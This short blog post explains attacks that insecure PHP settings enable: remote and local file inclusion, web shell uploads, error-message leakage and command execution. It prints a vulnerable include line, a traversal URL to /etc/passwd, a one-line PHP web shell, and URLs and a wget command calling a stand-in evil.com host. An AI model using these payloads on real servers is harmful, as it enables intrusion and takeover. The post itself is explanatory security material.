Sunday, March 15, 2026 • Sachin Prajapati

Attacks Caused by Insecure PHP Configuration

2. Real-World Attacks Caused by Insecure PHP Configuration

Many real-world breaches occurred because of insecure PHP settings.

1. Remote File Inclusion (RFI)

Occurs when attackers load malicious files remotely.

Example vulnerable code:

include($_GET['page']);

Attack:

http://site.com/index.php?page=http://evil.com/shell.php

If allow_url_include = On, the attacker executes remote code.

2. Local File Inclusion (LFI)

Attackers access sensitive files on the server.

Example attack:

http://site.com/index.php?page=../../../../etc/passwd

This reveals system users.

3. Web Shell Upload Attack

Attackers upload malicious PHP files.

Example file:

<?php system($_GET['cmd']); ?>

Then access:

site.com/uploads/shell.php?cmd=whoami

Now the attacker can run commands.

4. Information Leakage

When display_errors = On, attackers see errors like:

Fatal error in /var/www/html/config.php

This reveals:

  • server paths

  • configuration files

  • database credentials

5. Server Takeover via Command Execution

If dangerous functions are enabled:

exec()
system()
shell_exec()

Attackers can execute commands such as:

wget http://evil.com/backdoor.sh